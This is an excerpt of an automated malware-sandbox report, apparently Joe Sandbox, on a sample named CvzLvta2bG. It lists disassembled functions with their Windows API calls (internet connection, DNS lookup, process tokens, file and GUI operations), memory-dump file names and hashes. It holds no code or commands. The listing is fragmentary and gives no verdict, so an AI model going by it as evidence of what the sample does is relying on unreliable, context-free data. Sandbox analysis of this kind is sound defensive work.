Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50

_fprintf.LIBCMT ref: 00E209E5
OutputDebugStringW.KERNEL32(?), ref: 00E55DBB

Part of subcall function 00E24AAA: _flsall.LIBCMT ref: 00E24AC3

__setmode.LIBCMT ref: 00E20A1A

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 02f1d00726ed78c8ab9c66d1db4fc3daacad023ed9e4961e1f6dc61b4ea1a187
Instruction ID: 64ef9ace80ab32f8cb53417e31b1c942d9c30125f3728f2a3037fb20928406fe
Opcode Fuzzy Hash: 02f1d00726ed78c8ab9c66d1db4fc3daacad023ed9e4961e1f6dc61b4ea1a187
Instruction Fuzzy Hash: 1E1166B2A042146FDB08B7B4BC469FEB7E89F81320F642116F105B31C3EE30588687A1

Function 00E71767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E717A3

Part of subcall function 00E7182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E7184C
Part of subcall function 00E7182D: InternetCloseHandle.WININET(00000000), ref: 00E718E9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 3f1207f54c37deb5206156a9b644fccf30261fc600c6f9750ab1ac772c685f23
Instruction ID: c837713c7fa8b0ba07b5da36aeeca45af252593684391e6e233bbef9bf1ea78d
Opcode Fuzzy Hash: 3f1207f54c37deb5206156a9b644fccf30261fc600c6f9750ab1ac772c685f23
Instruction Fuzzy Hash: 4D218032200705BFEB169F649C01BBABBE9FF49710F10902EFA19B6550D7719815A7A1

Function 00E63A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00E8FAC0), ref: 00E63A64
GetLastError.KERNEL32 ref: 00E63A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E63A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E8FAC0), ref: 00E63ADF

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 8d0231f883922300c87b46cefa5267fe4b14f7c94ed0f3aace41cf63cba5eb85
Instruction ID: 41e5f87d7d1da983075adf0cea2b6d73f7d029ed05efbe596c7c3e2cf7114933
Opcode Fuzzy Hash: 8d0231f883922300c87b46cefa5267fe4b14f7c94ed0f3aace41cf63cba5eb85
Instruction Fuzzy Hash: 1F21A2345482018FC710EF74D8818AAB7E4AF553A8F146A1DF4E9E72E1D7319E4ADB42

Function 00E5DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E5F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E5DCD3,?,?,?,00E5EAC6,00000000,000000EF,00000119,?,?), ref: 00E5F0CB
Part of subcall function 00E5F0BC: lstrcpyW.KERNEL32(00000000,?,?,00E5DCD3,?,?,?,00E5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00E5F0F1
Part of subcall function 00E5F0BC: lstrcmpiW.KERNEL32(00000000,?,00E5DCD3,?,?,?,00E5EAC6,00000000,000000EF,00000119,?,?), ref: 00E5F122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00E5DCEC
lstrcpyW.KERNEL32(00000000,?,?,00E5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00E5DD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00E5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00E5DD46

Strings

cdecl, xrefs: 00E5DD3D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: fd63a198a23ef89e35e2f21e301ed3b27833bac79fa1c005da091c569e07e291
Instruction ID: 7542f4023a9531dcd855f500ce03294e7c3431a19ffc7a4fa24da35b05422ecc
Opcode Fuzzy Hash: fd63a198a23ef89e35e2f21e301ed3b27833bac79fa1c005da091c569e07e291
Instruction Fuzzy Hash: EA11BE3A204305EFCB25AF34DC4597A77B8FF45310B40A52AE806DB2A1EB719854C7A1

Function 00E350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E35101

Part of subcall function 00E2571C: __FF_MSGBANNER.LIBCMT ref: 00E25733
Part of subcall function 00E2571C: __NMSG_WRITE.LIBCMT ref: 00E2573A
Part of subcall function 00E2571C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 393ec2cfa3052a28d926639080ece4f3c190705c040daa7a8a6209d7eee0d317
Instruction ID: 798d5456a89870c89fe4319ab1bbc16ac2ba640ff58d66d93d30cc7b172d0864
Opcode Fuzzy Hash: 393ec2cfa3052a28d926639080ece4f3c190705c040daa7a8a6209d7eee0d317
Instruction Fuzzy Hash: A111C173502E21AECF312F71B909B5E3BD89B10365F106929F908B6250DE308941C790

Function 00E044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E044CF

Part of subcall function 00E0407C: _memset.LIBCMT ref: 00E040FC
Part of subcall function 00E0407C: _wcscpy.LIBCMT ref: 00E04150
Part of subcall function 00E0407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E04160

KillTimer.USER32(?,00000001,?,?), ref: 00E04524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E04533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E3D4B9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 78e7f10fb3071650c6e974bdb2f9d3263ede4ae1247873ce84e46f028a61dfa6
Instruction ID: c524384499022d21cb623d663858601d3e36bb498aa622e26fddbcc50ac979b2
Opcode Fuzzy Hash: 78e7f10fb3071650c6e974bdb2f9d3263ede4ae1247873ce84e46f028a61dfa6
Instruction Fuzzy Hash: 1721F8B1508794AFE7328B649C49BE6BFEC9B01318F04109EE79E761C1C37529C8C741

Function 00E76369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50

gethostbyname.WSOCK32(?,?,?), ref: 00E76399
WSAGetLastError.WSOCK32(00000000), ref: 00E763A4
_memmove.LIBCMT ref: 00E763D1
inet_ntoa.WSOCK32(?), ref: 00E763DC

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e71e97b5ca4315ab2ea51be7b644a2a64b28cebd28f497b1b69010ac4781ab9f
Instruction ID: 64272ebf940a61f1ce4182be4f9a83d4baa4457f4a4deea78e75a6509f16c437
Opcode Fuzzy Hash: e71e97b5ca4315ab2ea51be7b644a2a64b28cebd28f497b1b69010ac4781ab9f
Instruction Fuzzy Hash: 02114C32600109AFCB04FFA4D946CAEB7F8AF44310B549465F509B72A2DB30AE54CB61

Function 00E58B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00E58B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58BA4

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a8e484f1c7756c95ffb225ee4373d3dd1a1ef74ab5c4e050c1a683c5d5941beb
Instruction ID: deab8a3c5201364b4e1e922537eb0ba0d558d045cbbe3f837753166e492ebd31
Opcode Fuzzy Hash: a8e484f1c7756c95ffb225ee4373d3dd1a1ef74ab5c4e050c1a683c5d5941beb
Instruction Fuzzy Hash: 28115A79900218FFEB10DFA5CD84FADBBB8FB48710F2041A5EA00B7290DA716E14DB94

Function 00E01290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
GetClientRect.USER32(?,?), ref: 00E3B5FB
GetCursorPos.USER32(?), ref: 00E3B605
ScreenToClient.USER32(?,?), ref: 00E3B610

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: ccb649614f8123ea6ed48138adc8b4c3ca009e09cfadfa364af57ad3892342e2
Instruction ID: b80a4d4a690415bfce621d8ff22aa83067f60b9fdd6747117c5f5e9202fc3445
Opcode Fuzzy Hash: ccb649614f8123ea6ed48138adc8b4c3ca009e09cfadfa364af57ad3892342e2
Instruction Fuzzy Hash: C4113D35500019EFCB00DF95D8899EE77F8EB05300F4014A6F905FB190D730BA95EBA5

Function 00E5D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E5D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E5D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E5D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00E5D897

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 48761cdd838d2dcdd93af969e0e484df1a6b05f640ce3aa35c03b15dbf22a54c
Instruction ID: f02117db5ece214042fd8b633a4fabe954d9c19540cfecf161a80622cdffa8e4
Opcode Fuzzy Hash: 48761cdd838d2dcdd93af969e0e484df1a6b05f640ce3aa35c03b15dbf22a54c
Instruction Fuzzy Hash: 4C115E75609304DFE3348F51EC08F92BBBCEB00B01F108969EA5AE6050D7B0E94D9BA1

Function 00E36FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00E36FDB

Part of subcall function 00E376C2: __fltout2.LIBCMT ref: 00E376EB

__cftog_l.LIBCMT ref: 00E37001
__cftoe_l.LIBCMT ref: 00E37033

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 93c092e7bda3de8c95b38a640a5371af5de46c4825aa03898dbcefaf88a4c2fb
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 23014EB244414ABBCF2A5E84CC49CED3F62BB18355F589455FE9868131D236C9B1EF81

Function 00E8B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E8B2E4
ScreenToClient.USER32(?,?), ref: 00E8B2FC
ScreenToClient.USER32(?,?), ref: 00E8B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E8B33B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 77d6ae4130d3fb4cdb9687fe928ea240556a9918f39c242d008ffb7e02ccca4a
Instruction ID: 45be397d66d6f35672de2fbcaae9d0e63604c879aaf717dff06bced46ae93b84
Opcode Fuzzy Hash: 77d6ae4130d3fb4cdb9687fe928ea240556a9918f39c242d008ffb7e02ccca4a
Instruction Fuzzy Hash: 94117775D00209EFDB01DF99C4449EEBBF5FF18310F104166E915E3220D731AA559F90

Function 00E66BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00E66BE6

Part of subcall function 00E676C4: _memset.LIBCMT ref: 00E676F9

_memmove.LIBCMT ref: 00E66C09
_memset.LIBCMT ref: 00E66C16
LeaveCriticalSection.KERNEL32(?), ref: 00E66C26

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 156bac26bf86aca57ce6003e065592454a37905a8d570cdf0b7fa7c3427a0082
Instruction ID: a60bba7d9b8ae7c5887145450b6e65c6d7778ddb69c3bc32ecb016935a61842d
Opcode Fuzzy Hash: 156bac26bf86aca57ce6003e065592454a37905a8d570cdf0b7fa7c3427a0082
Instruction Fuzzy Hash: C0F05E3A200110BBCF016F55EC85A8ABB69EF45360F088065FE08AE267DB35E811CBB4

Function 00E02218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E02231
SetTextColor.GDI32(?,000000FF), ref: 00E0223B
SetBkMode.GDI32(?,00000001), ref: 00E02250
GetStockObject.GDI32(00000005), ref: 00E02258
GetWindowDC.USER32(?,00000000), ref: 00E3BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00E3BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00E3BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00E3BEC2
GetPixel.GDI32(00000000,?,?), ref: 00E3BEE2
ReleaseDC.USER32(?,00000000), ref: 00E3BEED

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 246934f5a23a873884cde93d60767c138e70d7f2f15cdb98f029142594603d08
Instruction ID: 89fac97e045ff6df93cf5ffef38f323bf99dd20fe0decc8d7c64ef3c7604a3ea
Opcode Fuzzy Hash: 246934f5a23a873884cde93d60767c138e70d7f2f15cdb98f029142594603d08
Instruction Fuzzy Hash: AFE03932604244EEDB215FAAEC4D7D83F10EB05336F108366FB6D680F287714994DB12

Function 00E58712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00E5871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00E582E6), ref: 00E58722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E582E6), ref: 00E5872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00E582E6), ref: 00E58736

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
Instruction ID: 23770d62be30e99d04327e919ea86f44e3fe00c5d955fc806c0e3409a52a4d8c
Opcode Fuzzy Hash: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
Instruction Fuzzy Hash: 62E086366113119FD7205FB25D0CB563BACEF54796F244828F649F9060DA348449C750

Function 00E06240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%, xrefs: 00E0624E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2291192146
Opcode ID: 63fafae590e37dd66e35720a6d2443278e034c42b5a254ac340b53ba316f0876
Instruction ID: 4068472129475b3c9a30ecb7224b92d79de83e3c31c21ef0da473e55732b28a3
Opcode Fuzzy Hash: 63fafae590e37dd66e35720a6d2443278e034c42b5a254ac340b53ba316f0876
Instruction Fuzzy Hash: 59B18C7190010A9BCF24EF94C885AEEBBB9FF44314F146026E952B72D1DB349EE5CB91

Function 00E7AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 00E7AFAE

Strings

xb, xrefs: 00E7AFE4
xb, xrefs: 00E7B010

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __itow_s
String ID: xb$xb
API String ID: 3653519197-3775679291
Opcode ID: 7bf4f05594e115139d0e97381f81709c7bb57a4e0315fab900e9360ab8222440
Instruction ID: d15403c0c5d7036c08d41da9a0d97d69acf38ecf433b001b3d18083f4a346d8e
Opcode Fuzzy Hash: 7bf4f05594e115139d0e97381f81709c7bb57a4e0315fab900e9360ab8222440
Instruction Fuzzy Hash: 62B15E70A00209EFCB14DF54C891EAABBF9FF58304F54D569F949AB292DB31E981CB50

